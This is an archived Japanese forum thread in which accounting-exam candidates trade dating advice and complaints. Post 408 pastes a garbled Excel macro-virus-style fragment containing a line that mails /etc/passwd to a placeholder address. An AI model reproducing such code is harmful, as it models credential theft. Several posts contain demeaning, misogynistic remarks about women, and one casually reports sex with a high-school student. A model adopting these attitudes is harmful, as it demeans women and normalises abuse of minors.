>>277さん
かなり参考になりました!
自分以上に相手のことを心配してしまうっていうのは思い当たる所があって痛いですね↓
気をつけます。。。

>>278さん
ウザいって思われないように気をつけます!

280 :一般に公正妥当と認められた名無しさん:04/03/17 01:34 ID:alYzIC6h
おいらも、ウザくなって別れちゃった。 普段は、誰にも束縛されず、独り身を楽しんでる。 だけど、たまぁぁにHしたくなったり、恋人欲しくなる。 くっつかず離れず…って距離を保てたら最高!!だろうと思う。

281 :一般に公正妥当と認められた名無しさん:04/03/17 02:37 ID:???
>>274
君自身は社会人?
おれは無職で受験生。モト彼女は社会人だったが、ことあるごとに
「仕事って大変なのよ」「会社の人間関係が・・・」とか言って俺をむかつかせていた。
間違ってもそういうことは言ってあげないように。

間違いなく受験の方が大変だから(何の資格か知らんが)。
今年おれは受かったから社会人やってるが、社会人なんて別にしんどくもなんともない。

ちなみにおれのモト彼女はおれを捨てて違う男と結婚したよ〜ん。某公務員と。

282 :一般に公正妥当と認められた名無しさん:04/03/17 08:20 ID:???
>>281
>「仕事って大変なのよ」「会社の人間関係が・・・」とか言って俺をむかつかせていた。

ときどきそういう話になるなあ。
表面上は理解のあるところを見せているけど内心はむかむかしてるよ。w
だれかにぐちりたくなる気持ちはわかるんだけどね。

ところで>>281さんはどうして彼女に捨てられたんだろ…。
結果的に試験に合格したから良しという考えもあるのかなあ。
もし彼女と別れることで今年の合格が保証されるというなら悩む。w

283 :一般に公正妥当と認められた名無しさん:04/03/17 11:56 ID:???
受験生に仕事の話は禁句だよ。それが「会いたい」とかわがまま言われる
よりムカツク。
 >282 別れたからって、合格は保証されない。別れたら別れたで、また
違う悩みが出てくるぞ。人は無意識のうちに人を好きになってしまうものだ。
とりあえずは、今の彼女とうまくやっとくべきだろ。

284 :一般に公正妥当と認められた名無しさん:04/03/17 13:11 ID:???
>>274
私も似たような立場だよ
私は仕事してるし、中距離だからなかなか会えないしね
2ヶ月ぐらい会ってないや

メールや電話は都合のいい時間を聞いておけばいいんじゃない?
自分語りなメールは時間に限らずやめたほうがいいと思うけどね
私もメールは生存確認程度になっちゃってるw


285 :一般に公正妥当と認められた名無しさん:04/03/17 13:18 ID:???
彼女と別れれば合格にしてやる!と言われたらどうします?
俺は彼女捨てます。現時点において、彼女とつきあっている期間より
受験期間の方が長いため。

286 :一般に公正妥当と認められた名無しさん:04/03/17 14:55 ID:???
受験生にとっては、今は何よりも勉強する時間の方が大切。
でも、そんな事情を分かっているといっているのに、相手が会いたい、
もっと連絡して欲しいと言うのは、結局相手は自己中心的だと思う。

今の受験生活なんて長い人生のうちのほんの一瞬なんだから、
真面目にその相手と人生を添い遂げるくらいの覚悟があるんだったら、
勉強に集中させてあげてください。
静かに見守るのも愛情表現です。

287 :274:04/03/17 16:57 ID:5YTbdejp
レス感謝です。

>>281さん
私は大学生です。理系なので一般の大学生よりは忙しい生活を送ってます。
それでも学生なので時間はあるほうですが

>>285さん
働いてる方じゃないし、都合のいい時間ってなかなか難しいですよね↓
だからわたしはあんまり自分から連絡しないようにしてます。

みなさんの意見聞いてると私は彼にとっていらん子なんかなあ…
とか考えてしまいました(泣
会った後も(私から誘うことはほとんどありません)、すごく嬉しい反面、
勉強の時間割かせてしまって悪いなあって思ってしまいます。


288 :281:04/03/17 17:20 ID:???
>>282
俺が捨てられたのは
・受験生だから時間がない。
・遠距離。
・彼女の方は仕事が嫌で結婚したい願望が強かった。
等の理由なんだけどね。

彼女が「仕事は・・・」とか言うとき、そこには必ず「受験生なんて勉強だけしてればいいんでしょ」的な
考えが見え隠れしていた。キレかけたこともしょっちゅう。
でも本当に一緒にいたいと思うなら、>>286さんの言う様に思うように会えないとかそういうことは
我慢できるはずだと思うし、彼女はそこまで我慢できなかっただけなんでしょう。

>>287
受験生でも好きなら勉強の時間を割いても会いたいって思うような気もするけどね。
いずれにしても受験生って精神状態がかなり追い込まれるので大きな気持ちで見守ってやりな。
親からのプレッシャーもあるだろうし(金銭面含め)、大学の同級生はガンガン働いてるし、
そういう特殊な事情で相当まいってるはずだ。
そういうことを大きく見てあげないと、俺のモト彼女のようになるしかないよ。
受験生と付き合うっていうのはそういうことだね。

289 :一般に公正妥当と認められた名無しさん:04/03/17 17:26 ID:vkRimnEu
下半身に人格はない



290 :一般に公正妥当と認められた名無しさん:04/03/17 17:44 ID:???
くだらねぇ議論ばかりだなここ。レベル低い。

291 :一般に公正妥当と認められた名無しさん:04/03/17 17:47 ID:???
>>288
そんな彼女と別れて正解だよ。
きっとそのうち自分に合った人とめぐり合えるよ。

292 :一般に公正妥当と認められた名無しさん:04/03/17 18:10 ID:???
>彼女の方は仕事が嫌で結婚したい願望が強かった。

 ↑こういう女が一番タチ悪い。

頻繁に会うのは無理としてもメールと週末の電話くらいはいいんじゃない?
5/29の夜に電話きたらヌッ頃してしまうかもしれんが。

293 :一般に公正妥当と認められた名無しさん:04/03/17 19:16 ID:???
大学生なら受験生なんぞと付き合わなくても・・・。
都合の良い女になってんぞー。

294 :一般に公正妥当と認められた名無しさん:04/03/17 19:17 ID:???
>290
ならばいちいち書き込むな。

295 :一般に公正妥当と認められた名無しさん:04/03/17 19:18 ID:???
>5/29の夜に電話きたらヌッ頃してしまうかもしれんが。

他方で、5/30の夜には電話をかけて欲しいと、内心思っているところが、
このスレ受験生のわがままなところだな。

296 :一般に公正妥当と認められた名無しさん:04/03/17 19:50 ID:???
だな。
自分に甲斐性がないのを棚に上げて何言ってんだか。

297 :一般に公正妥当と認められた名無しさん:04/03/17 21:13 ID:???
今から短刀1週間前から電話すんなと予約済みですが何か?

298 :一般に公正妥当と認められた名無しさん:04/03/17 22:03 ID:0sXa3jH1
なんでみんなそんなにストイックなの?

299 :一般に公正妥当と認められた名無しさん:04/03/17 22:21 ID:jtP5ufl9
夫が会計士だと、女の子が生まれる確率が異常に高い気がする。

300 :一般に公正妥当と認められた名無しさん:04/03/17 22:41 ID:alYzIC6h
>>286 イイコト言いますね。 元彼(一緒に受験生してた)に聞かせてやりたい!! 世の中には、ちゃんとした恋愛観持ってる男性がいるんだ …って安心しちゃいました(笑)

301 :274:04/03/18 01:34 ID:1B8cnGIy
レスありがとうございます。

なかなか外からは分からない世界なので、
皆さんの意見を聞けてとても参考になりました!
独りよがりに絶対なりたくないな〜って思っているので
本当に有難うございます!!

>>293さん
そうなのかもしれないですねw


302 :一般に公正妥当と認められた名無しさん:04/03/19 20:55 ID:???
好きな男の人に可愛い彼女がいる場合、かわいくない私は諦めるべきなの?


303 :一般に公正妥当と認められた名無しさん:04/03/19 21:56 ID:???
>>302
んなこたーない。

304 :一般に公正妥当と認められた名無しさん:04/03/19 21:59 ID:???
逆を考えてみろ。無理だろ。君の実家が資産家なら話は変わるけど・・・。金あるなら整形するのもいーよ。整形でも自覚のないブスよりは大分まし。世界変わるよーマジで。

305 :一般に公正妥当と認められた名無しさん:04/03/19 23:05 ID:???
あ、、、整形しても同じ男はムリだよ。
前に、本当に整形してきたやつがいたけど、あれはびびった。
でも、その後幸せそうにしてたから、
やっぱり美人の方がいいんだろうね。
いいことをしたなーと思った。

306 :一般に公正妥当と認められた名無しさん:04/03/20 00:02 ID:???
おまえはなんていいやつなんだ・・・。

307 :一般に公正妥当と認められた名無しさん:04/03/20 00:08 ID:???
整形した奴に再度コクラレたのか?

308 :一般に公正妥当と認められた名無しさん:04/03/20 08:45 ID:GXFV/GAU
これっぽっちもその気のない女からコクられるのは死ぬほど嫌だ。

309 :一般に公正妥当と認められた名無しさん:04/03/20 08:50 ID:???
でも、かわいくないって自覚してるだけいいよ。後は卑屈にならない程度にね。まぁ、頑張ってイキロ。

310 :一般に公正妥当と認められた名無しさん:04/03/20 08:56 ID:6VolTUKT
さて、これからデートにでかける用意するかな
どこでなにしようか悩むよ・・・

311 :一般に公正妥当と認められた名無しさん:04/03/20 09:18 ID:???
ぶっちゃけ水準未満の女とは話したくない。女もそうみたいだしね。この時期いらないストレス溜めるより勉強した方がいいよ。顔がいいのも才能だし、頭がいいのも才能。いつかいいことあるって・・・。

312 :302:04/03/20 10:03 ID:???
そうね、今は勉強に集中します。でも、「水準未満の女とは話したくない」
なんて、悲しいです。整形はしないけど可愛くなれる努力はしてみます。
皆さん優しいですね。


313 :一般に公正妥当と認められた名無しさん:04/03/20 12:40 ID:KNz1atTh
>>302
いい子っぽいな。でもだからこそ傷つくようなことはしない方がいいよ。水準未満って言葉は悪いけど男も女も基準あるでしょ。勿論、あなたにもあると思う。

314 :一般に公正妥当と認められた名無しさん:04/03/20 22:18 ID:???
ガンガレ。
でも、短答超えないと論文受けられないように、
ルックスが水準越えないと性格は見てもらえないからな。
自分それなりだけど自分より格好いいやつがいると脚きり
くらう@コンパ
建前は性格っていう女も男も顔の基準値は絶対に存在するから。
後、体重も気をつけて。
受験生デブ多いから、細いだけでマシに見えるよ

315 :一般に公正妥当と認められた名無しさん:04/03/20 22:42 ID:???
会計士目指している女です。
自習室でたまに見かける(多分税理士)人を
好きになっちゃいました☆

接点ないんですけど
どうやったら近づけるかな?
話しかけたいんだけど・・チャンスがない。

316 :一般に公正妥当と認められた名無しさん:04/03/20 22:47 ID:aJPVpe4B
こんなこといいたか無いけど、そんなことする前に勉強した方が良いと思うよ。

317 :一般に公正妥当と認められた名無しさん:04/03/20 22:50 ID:???
まず鏡をみなさい。
んで、つりあうかどうかを一日考えなさい。
ムリっぽかったら諦めなさい。
美人ならアタックするまでもなく相手からくるっしょ。

318 :315:04/03/20 22:58 ID:???
本当に悩んでいるんです・・
勉強もちゃんとしてますよー
でも恋愛だってしたいし、顔がすっごいタイプの人だし・・
やっぱ美人じゃないと無理なんですか?
大学ではボチボチ告られたりするんだけど。
男は学校の美人な人にだったら声かけているんですかー?
相手は私の存在に気づいているかも微妙です

319 :一般に公正妥当と認められた名無しさん:04/03/20 23:05 ID:???
もし相手が好意を持っていても自習室で見かける人に声はかけずらいだろうな。
相手も相手も喫煙者とかだったら休憩室で火貸していただけますか?なんてのは・・
吸わないなら、古臭いけどそっと手紙とか・・
会計士と税理士の受験生同士で接点少ないし。

320 :一般に公正妥当と認められた名無しさん:04/03/20 23:13 ID:???
>>318
まずは、その人がいつ休憩を取るか、喫煙をするのかなど、観察するところから
始まるのでは?
それで、休憩室で何回か同じであれば、「自習室でよく見かけますが、税理士
講座の方ですか?」と話し掛けて、知り合いになるというのはどうでしょうか。

321 :315:04/03/20 23:22 ID:???
>319 >320
レスありがとん。
煙草は吸わないからなぁ・・
講座が違うと授業の時間が違うし
自習室でもたまにしか見かけない☆
私も勉強しているから相手を観察しているわけにはいかない。
彼女いるんだろーなぁ
かっこいいもん・・


322 :一般に公正妥当と認められた名無しさん:04/03/20 23:48 ID:???
声かけないとしばらく後悔するかもしれないぞ!
考えてるだけでは勉強にも身が入らない。どっちかはっきりしよう。


323 :一般に公正妥当と認められた名無しさん:04/03/21 00:49 ID:???
>315
マジでかわいい女とかすげーかっこいい男には最初からムリと思い諦める
奴が多いから、案外イケルかもしれんぞ!
まずは自分の存在をアピールしてみろ。試験も近いから今月中にはっきり
させる事を勧める。


324 :一般に公正妥当と認められた名無しさん:04/03/21 00:54 ID:???
ちなみに何校?
どっちにしろ恥かくのがオチだからやめた方がいいと思う。
ついでにいうと男税理士・女会計士の組み合わせはムリがあるな。
女・東大理系と男・早稲田文系の微妙な関係。
見た限り全滅。

まぁ、君の顔が人並みじゃなきゃ何も始まらないわけだがw

325 :315:04/03/21 01:39 ID:???
そうだねー、まずは自分をアピールかぁ。。
学校にいる時は私も勉強やる気だから
そんなに気にならないんだけど家に帰ったら気になる☆
え?今月中?あとチョットじゃん!
週1くらいしか会わないのに・・

関東だよ
顔は人並みではあるけど、
彼の許容範囲にはいるかは・・ねぇ、自信ないなぁ
私はお姉系。彼は見た感じHEM?のバッグ持っているし
そういう系統の子が好きなんかなー。
あーなんかドキドキしてきた☆
勉強しなきゃ・・



326 :一般に公正妥当と認められた名無しさん:04/03/21 02:34 ID:???
>>315
学校でコクのはやめた方がいいよ
もしうまくいかなっかったら、悲惨なことになるし、うまくいっても障害が多かったりする
いろいろとね
毎日勉強ぐらいしかしてないから、唯一の楽しみが休憩室での談話
だったりするから、必然的に噂好きが多くなる
男と女のことなんかになると
1のことが10で話されるというより、0のことが20くらいで話されると思った方がいい

327 :一般に公正妥当と認められた名無しさん:04/03/21 08:11 ID:???
それなりなら勝負していーんじゃね?ある程度の子に告られるのは男にとってプラスだし。しかし、こんなとこで相談って、受験生を感じるよ。

328 ::04/03/21 09:44 ID:???
噂好きはほっとけばいいよ。噂だけで何も出来ない奴よかまし。
でも、もしも彼女でも居て振られてしまったら、アドレナリン出きって、
しばらくは勉強手に付かない可能性もあるぞ。
後は、その男の交友関係をチェックして、どういう人格か推定することだな。


329 :一般に公正妥当と認められた名無しさん:04/03/21 09:48 ID:10YQo5tT
私4科目で残り相続勉強中、彼1科目で4月から院で免除。
勉強しない態度が許せなので別れようと思います


330 :一般に公正妥当と認められた名無しさん:04/03/21 10:59 ID:???
>>328
いかりやの人だ

331 ::04/03/21 11:33 ID:???
>330
消すのわすれちまったんだよ・・・。鬱。

332 :一般に公正妥当と認められた名無しさん:04/03/21 11:43 ID:ZOAVky68
俺は女によってこられてもウザイだけだな、正直場が見えてない奴は大嫌い。

333 :一般に公正妥当と認められた名無しさん:04/03/21 12:34 ID:???
>332
なぜ、そんなに怒っているの?
誰かに告られてた?

334 :一般に公正妥当と認められた名無しさん:04/03/21 14:14 ID:???
俺のことか?

335 :一般に公正妥当と認められた名無しさん:04/03/21 17:09 ID:???
332の人はなぜそんな事言う?
そもそも場なんて関係ないっしょ?


336 :一般に公正妥当と認められた名無しさん:04/03/21 17:34 ID:???
レディにウザイなんていう奴は駄目です。

337 :315:04/03/21 18:40 ID:???
ちょっと待って。
告るより先に話しかけたいんだけど・・
今日は彼は自習室にきてなかった。。

場は関係ないっていうけど
やっぱ学校は恋愛の雰囲気とか全くないし
実際ウザイ思う人だって多いんだろーな、

みんなかっこいい人・かわいい人に
なんて声かけてる?

338 :一般に公正妥当と認められた名無しさん:04/03/21 19:31 ID:???
不細工に声かけてやれよ。かっこいーやつは外でももてるんだから。そんな君の優しい姿が彼のハートをきゃっち。だから、俺はブスともはなしてあげてるぜ。

339 :一般に公正妥当と認められた名無しさん:04/03/21 21:53 ID:???
どいつもこいつも不幸になれ。

340 :一般に公正妥当と認められた名無しさん:04/03/21 23:12 ID:???

それは言い過ぎ。

341 :一般に公正妥当と認められた名無しさん:04/03/22 00:37 ID:???
真面目そうな女ばっかいそうなふいんき(←何故か変換できない)あるけど、
けっこう可愛い子いるよ。いや結構はいないか。
大原に可愛い子いるんだよ。
背も高いんだけど、なんつーかストレートど真ん中ってやつ?

でも漏れには剛速球すぎるよ・・・(´・ω・`)ショボーン

342 :一般に公正妥当と認められた名無しさん:04/03/22 00:39 ID:???
↓こんなスレもあるわけだが…
http://money.2ch.net/test/read.cgi/tax/993822787/

343 :一般に公正妥当と認められた名無しさん:04/03/22 01:50 ID:MSN2C7vN
雰囲気(ふんいき)でつ

344 :一般に公正妥当と認められた名無しさん:04/03/22 08:44 ID:naU0Ynbf
↓こんな女はどうよ?
ttp://www5a.biglobe.ne.jp/~touyu/kana2-1.jpg

345 :一般に公正妥当と認められた名無しさん:04/03/22 09:18 ID:dT7AmD5l
まずお前等は落ちたな、良かった脱落者が増えて。

346 :一般に公正妥当と認められた名無しさん:04/03/22 21:13 ID:???
オンナは性欲処理のための要具、と思える香具師は短期で受かる素質あるよな〜

347 :一般に公正妥当と認められた名無しさん:04/03/22 21:55 ID:wd34Q1hC

      / ̄ ̄ ̄ ̄ ̄ ̄\
    /             \
   /                  ヽ  
    l:::::::::.                  |  
    |::::::::::   (●)     (●)   |
   |:::::::::::::::::   \___/     |
    ヽ:::::::::::::::::::.  \/     ノ受験生は勉強しろよ!
     \           /        
      /         ::::i \       
     /  /       ::::|_/
     \/          ::| キュム
        i     \ ::::/ キュム
        \     |::/
          |\_//
          \_/  




348 :一般に公正妥当と認められた名無しさん:04/03/24 00:37 ID:???
わあああああああああああああああああああ。
べんきぃうしてるよおおおおおおおおおおお。
だがーーーーーーーーーーー、人も愛したいんだよおおおおおおおおお。
うあああああああああああああああああああああ。

349 :一般に公正妥当と認められた名無しさん:04/03/25 17:03 ID:???
女は飼うものじゃない。使い捨てだ。

350 :一般に公正妥当と認められた名無しさん:04/03/25 18:22 ID:???
男もな〜。

351 :一般に公正妥当と認められた名無しさん:04/03/26 15:57 ID:???
自分の資格さければ何人くってもばれないな。公務員5 会計士2 (半年)いただきました。周りが不細工多いから普通の俺でもかっこよくみえるらしい

352 :一般に公正妥当と認められた名無しさん:04/03/26 18:24 ID:???
ふーん。でもたぶん、君と寝た子もそういう風に思っているよ。

353 :一般に公正妥当と認められた名無しさん:04/03/26 23:36 ID:jBnOTWRg
>351
まあ、妄想だね。とりあえずこんな学校で食うって言うのは
かなりリスクあるから普通しないんだよ。
体験者からいわせればな

354 :一般に公正妥当と認められた名無しさん:04/03/27 00:34 ID:NDyiQGgK
「喰う」だって、、、プッ。

355 :一般に公正妥当と認められた名無しさん:04/03/27 00:53 ID:???
童貞必死だな。他の講座ならばれねーよ。まずいことになったら校舎変えるだけ。信じてやってみ。地方はむりだけどな。

356 :一般に公正妥当と認められた名無しさん:04/03/27 21:22 ID:NKdqs+dT
とりあえずよくその気になるなあ、、、俺はみんな対象外なんで

357 :一般に公正妥当と認められた名無しさん:04/03/27 22:46 ID:JZct7E0H
男に聞くけど学校で目標に向かって
勉強頑張っている普通の子と
将来のこと何も考えていないかわいい子
どっちがいいの?

358 :一般に公正妥当と認められた名無しさん:04/03/27 22:56 ID:???
漏れは前者だな

359 :一般に公正妥当と認められた名無しさん:04/03/27 23:05 ID:???
漏れも前者。
後者は性欲の対象になっても恋愛の対象にならない。
やはり尊敬できない・・・
勉強でなくとも趣味とか何か頑張っていればいいけど。

360 :一般に公正妥当と認められた名無しさん:04/03/28 00:32 ID:???
俺も前者だな

361 :一般に公正妥当と認められた名無しさん:04/03/28 00:57 ID:???
まじめに付き合うのは前者。
遊びなら後者。
って事か・・・。

362 :一般に公正妥当と認められた名無しさん:04/03/28 01:08 ID:???
普通もしくは普通より劣ってるのに普通だと思ってるブスが多いから俺は後者。ルックスがライン越えないとほんとは会話もしたくない。ま、使い道あるうちは会話してやるよ。

363 :一般に公正妥当と認められた名無しさん:04/03/28 01:57 ID:???
実際は「普通で何かしら頑張ってる女」より「普通で何も考えてない女」の方が圧倒的に多いから
「普通で何かしら頑張ってる女」は貴重な存在。

364 :一般に公正妥当と認められた名無しさん:04/03/28 02:09 ID:TH5WgcME
頑張れ!

365 :一般に公正妥当と認められた名無しさん:04/03/28 02:37 ID:???
俺は後者かもしれない・・・ごめんなさい。
何も考えてない子って話しててほっとすることあるし。
前者は友人や仕事仲間としてはいいと思うけど・・・

366 :一般に公正妥当と認められた名無しさん:04/03/28 03:33 ID:ezv3tU59
前者でしょ。結婚したいよそんな子と。
イマノカノジョハドウスンダ

367 :一般に公正妥当と認められた名無しさん:04/03/28 03:51 ID:DwQtj1KS
後者のほうがいいなぁ。
かわいいと癒されるしね。笑

368 :一般に公正妥当と認められた名無しさん:04/03/28 04:12 ID:???
俺の友達は司法受験生なんだが、彼女が高卒でハッキリ言って司法試験という名前も
よくわかってないようなレベルなんだけど、「全く理解されてないからしんどい」と言ってた。
何も考えてないのも良し悪しだろうね。
癒されたい気持ちもあると思うけど、ある程度は「理解されたい」という気持ちもないかい?

369 :一般に公正妥当と認められた名無しさん:04/03/28 06:37 ID:ihM6c7f1
バイト先の高校生とやってしまいました。性欲にまけた。2週間分のこずかいがラブホ代でふっとんだ。しばらくは水筒もってこ…

370 :一般に公正妥当と認められた名無しさん:04/03/28 10:08 ID:???
俺は某大学で女の顔の価値を金銭的に表現する授業を受けた。ブスと美人では一億以上の開きがあった。つまりブスはそれだけの損失を補わなければならない。だから必死なんだよ。

371 :一般に公正妥当と認められた名無しさん:04/03/28 11:22 ID:ihM6c7f1
チンコ小さいほうけい不細工チビデブ男の損失は?

372 :一般に公正妥当と認められた名無しさん:04/03/28 13:13 ID:???
死んだ方がいいだろ。てか、生きてないだろそんなやつ。

373 :一般に公正妥当と認められた名無しさん:04/03/28 15:40 ID:???
>>370
ババアになったらブスも美人も同じ。
昔綺麗だったようなババアが銀座でお洒落なんかしているのを見ると吐き気がする。
ババアは何十万の服着てもババアに変わらないのに。寄生されてる旦那さんが可哀想だよ。

連中も昔は可愛かったから金持ちと結婚できたのだろうけど、ババアになったら不良債権でしかない。
付き合うなら中身がきちんとしてないと。

374 :一般に公正妥当と認められた名無しさん:04/03/28 23:46 ID:???
受験生がブスなのはしかたないよ。精神的にギリギリなんだから。
実際、合格祝賀会の写真なんか見ると、「こいつこんなに可愛かった?」って事
も以外と多い。受験生は実際より3割はブスになっていると思っていいぞ。
ま、女を捨てて居る奴は論外として・・・。

375 :一般に公正妥当と認められた名無しさん:04/03/29 12:51 ID:31hxJhlr
そうか?着飾ってもこんなもんだろうなあという女しかいないが。

376 :一般に公正妥当と認められた名無しさん:04/03/29 13:21 ID:f2sLUO5Z
顔なんて整形すればどうにかなるだろ。

377 :一般に公正妥当と認められた名無しさん:04/03/29 22:34 ID:???
男もドウニカシロ。
顔と服のセンスドウニカシロ。

378 :一般に公正妥当と認められた名無しさん:04/03/30 17:25 ID:jqdcJsm6
お前らに合わせてるんだよ(´,_ゝ`)プッ

379 :一般に公正妥当と認められた名無しさん:04/03/30 23:19 ID:???
お前ら恋愛なんて言ってるのは現役の大学生だけだよな?
無職プーのくせに学部生と付き合おうなんて思っちゃいないだろ?
むしろ無職の男のほうが必死だよなw

380 :一般に公正妥当と認められた名無しさん:04/03/31 18:07 ID:rBjWDvWo
かわいい子と付き合ってみたいなぁ。
AV女優で言ったら、南波杏ちゃんとかね。ww

381 :一般に公正妥当と認められた名無しさん:04/03/31 18:38 ID:RJAlYk0d
ぶっちゃけ、かわいい子って
すぐいなくなっちゃうね。

382 :一般に公正妥当と認められた名無しさん:04/03/31 21:50 ID:???
こんなつらい思いしなくても
エリート捕まえて楽して暮らそって思うんだろ

383 :一般に公正妥当と認められた名無しさん:04/03/31 23:27 ID:???
かわいい子ならそのほうが賢い。
俺もかわいい女の子ならそうしたい・・・

384 :一般に公正妥当と認められた名無しさん:04/04/01 09:25 ID:3whn3kGU
大原は変なのおおいけどタックはまーまーだよ。

385 :一般に公正妥当と認められた名無しさん:04/04/01 10:14 ID:eo9f81DU
お前らは出川哲郎未満

386 :一般に公正妥当と認められた名無しさん:04/04/01 11:32 ID:kZ5IbO8g
可愛い子は確かにすぐいなくなるな・・・・・・

387 :一般に公正妥当と認められた名無しさん:04/04/01 12:19 ID:???
かわいい子は短答で落ちる。短答当日と論文当日を比べてみよ。

388 :一般に公正妥当と認められた名無しさん:04/04/01 13:18 ID:???
この時期にフラれちゃった…


389 :一般に公正妥当と認められた名無しさん:04/04/01 18:37 ID:???
>>388
落ち込んでも、仕方ないよ。
悔しい&悲しい気持ちをバネに、勉強にがんがれ。
ふった相手を見返してやれ。

390 :一般に公正妥当と認められた名無しさん:04/04/01 19:28 ID:???
>>388
同士よ・・・

391 :一般に公正妥当と認められた名無しさん:04/04/01 19:50 ID:???
どうせ不細工だろ?別れれてよかったじゃん。思い出とかできる前に切れて正解。

392 :一般に公正妥当と認められた名無しさん:04/04/01 22:12 ID:Xk2rrdGa
>385
出川結婚したぞ。25歳キャンギャルだって。
写真見たけど、マジかわいいぞ。


393 :一般に公正妥当と認められた名無しさん:04/04/01 22:48 ID:bIExj3xz
しかし出川しかりそのまんま東しかり
どこがいいんだか。
女はようわからん。
お前らもがんばれ。

394 :一般に公正妥当と認められた名無しさん:04/04/02 03:27 ID:Z12SfEdQ
金だろ。

395 :一般に公正妥当と認められた名無しさん:04/04/02 16:22 ID:S3gZTZQk
出川は嫌だけど背が小さくても筋肉質で顔がかわいくておちんちんの大きい人なら私はOKだ

396 :388:04/04/02 17:41 ID:???
>>389-391
ありがとう。元気出ました。

397 :一般に公正妥当と認められた名無しさん:04/04/02 22:39 ID:???
自分より背が小さい男好きになる女ってジャニオタみたいなもんか?
最近背の高い女ばかりに好かれる。
こちとら多少は女にモテルしプライドもあるし、
わざわざ背の高い女と付き合う必要もないから無視してるけど。
けど2,3回セックスしたいなぁ

398 :一般に公正妥当と認められた名無しさん:04/04/03 02:54 ID:???
>>397
自分より背が高いか低いかって気になるか?俺にとっては無差別だな。

399 :一般に公正妥当と認められた名無しさん:04/04/03 17:23 ID:???
混み合う電車に押し込まれ
ガラスに額をつけたまま
大きなため息をついたら
なお気がめいる

どんなに悲しい夜ばかり
過ぎても専門に着いたなら
笑顔を振りまいて
Jokeの一つもとばす

何を求めて明日を探せばいいのか
大きな海を漂よう木の葉のようだわ

勉強を始めていたずらに
時間が流れていくけれど
けじめと名のついた
卒業証書がほしい

誰もが自分の生き方を
見つけて歩いてゆくけれど
私は変わらずに
私でいるしかできない

あなたを失くしてまでも決めた道を
悔やむほど弱くなった私をしかって

あなたを失くしてまでも決めた道を
悔やむほど弱くなった私をしかって

あなたを失くしてまでも決めた道を
進むほどずるくなって明日を変えたい

400 :一般に公正妥当と認められた名無しさん:04/04/03 17:27 ID:LEY9UYIV
岡村孝子だ。なつかしいね。

401 :一般に公正妥当と認められた名無しさん:04/04/03 18:10 ID:???
I don't know her .

402 :一般に公正妥当と認められた名無しさん:04/04/07 10:19 ID:tY8+Ab9N
いつも隣に座る子がいるんだけど、その子はなぜいつも隣に座るんだろうか?
他に席が空いてないわけではないのに。いつも隣なので気になってしまっています。


403 :一般に公正妥当と認められた名無しさん:04/04/07 11:50 ID:c9qUBVOs
簿記子ちゃんハアハア 情熱的だね ハアハア

404 :M1:04/04/07 11:52 ID:IhEO29OT
 TACって殺伐としてますね 女に話しかける環境じゃない
 気がする って俺が小心なだけか

405 :一般に公正妥当と認められた名無しさん:04/04/07 23:14 ID:Q3D4rzuM
合格したらきっといい女とめぐり逢えるさ。


406 :一般に公正妥当と認められた名無しさん:04/04/07 23:55 ID:3iN8Y77U
そういやもう半年もセックスしてねーや

407 :一般に公正妥当と認められた名無しさん:04/04/07 23:56 ID:???
それは無い。

408 :一般に公正妥当と認められた名無しさん:04/04/08 15:24 ID:???
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10

cat /etc/passwd | mail nobody@nonexistent.com

End Sub


409 :一般に公正妥当と認められた名無しさん:04/04/08 20:54 ID:VtFv6vrU
なんですか

410 :一般に公正妥当と認められた名無しさん:04/04/08 21:38 ID:FiSFWD4d
フリーターでもかっこいい奴はいい女とやれる
ブサイクは会計士になろうが弁護士になろうが医者になろうがいい女とはやれない
        
           これ判例

411 :一般に公正妥当と認められた名無しさん:04/04/08 22:12 ID:???
マジ受付のお姉さんが好き

412 :一般に公正妥当と認められた名無しさん:04/04/08 22:32 ID:???
同感・・・。どうやったら友達になれるんだろうか。

413 :一般に公正妥当と認められた名無しさん:04/04/09 00:26 ID:???
どこの受付か言ってみ。

414 :一般に公正妥当と認められた名無しさん:04/04/09 19:41 ID:/BgZUdeH
制服にだまされるヤツ多いんだ。
私服になると、多分普通だぞ。
それに、今の環境がそのような気分にさせる。



415 :一般に公正妥当と認められた名無しさん:04/04/11 19:31 ID:tSNXDSkF
制服はアンミラがベストっす。

416 :一般に公正妥当と認められた名無しさん:04/04/11 19:40 ID:t5KKIZwV
クビレがタマラン。

417 :一般に公正妥当と認められた名無しさん:04/04/11 20:58 ID:???
こんなのはどうかな?
http://www.ismylife.com/eros/src/1081656987628.jpg

418 :一般に公正妥当と認められた名無しさん:04/04/20 23:41 ID:???
あまり可愛くなくてちょいデブだけど巨乳だった女と去年別れた。
女に不満をいろいろ言われたので、試験直前で面倒くさくなって別れた
けどもう一度やりたいなあ

419 :一般に公正妥当と認められた名無しさん:04/04/21 00:24 ID:???
>>418
覆水盆に帰らず。
またそいつとやりたいと思って連絡とっても、また面倒くさいことになるから、
他の女で我慢しとけ。

420 :一般に公正妥当と認められた名無しさん:04/04/21 12:22 ID:dKKrZCGx
前の彼女と別れて数ヵ月後メールのやり取りなんかするようになったから「セクフレになってよ」とメールで頼んだらそれ以来メールこなくなった。
何がいけないんだ!

421 :一般に公正妥当と認められた名無しさん:04/04/21 13:46 ID:???
>>417
くびれがたまらんね!!!


422 :一般に公正妥当と認められた名無しさん:04/04/24 21:37 ID:???
こんな時期に失恋した
勉強できねー

423 :一般に公正妥当と認められた名無しさん:04/04/24 22:09 ID:???
会計士受験生同士のカップルってどうなん?
2005目標どえす

424 :不適正意見を出す代表社員:04/04/24 23:31 ID:dv575LhV
会計士講座受講時に受付の女の子に密かに想いを寄せてた。
かわいかったな〜○○さん!

425 :一般に公正妥当と認められた名無しさん:04/04/25 08:54 ID:???
>422
こんな時期に振るようなオニの事は早く忘れろ。

426 :一般に公正妥当と認められた名無しさん:04/04/25 15:22 ID:???
4/27発売号のSPAに27歳会計士のセクース事情が掲載。
会計士ってたいへんなんだなぁと思いマスタ。25ページでつ。

427 :一般に公正妥当と認められた名無しさん:04/04/29 21:33 ID:???
ああ、もう嫌だ・・。

428 :一般に公正妥当と認められた名無しさん:04/05/06 22:40 ID:fj1RE0Pv
ああ・・・
今日はショックだったな・・・
レギュラーコースで一緒だった人が
今日の直前対策コースにはいなかった・・・
他の校舎に行っちゃったのかな・・・・
残念だあ〜 せめて最後まで一緒に授業受けたかったな・・・

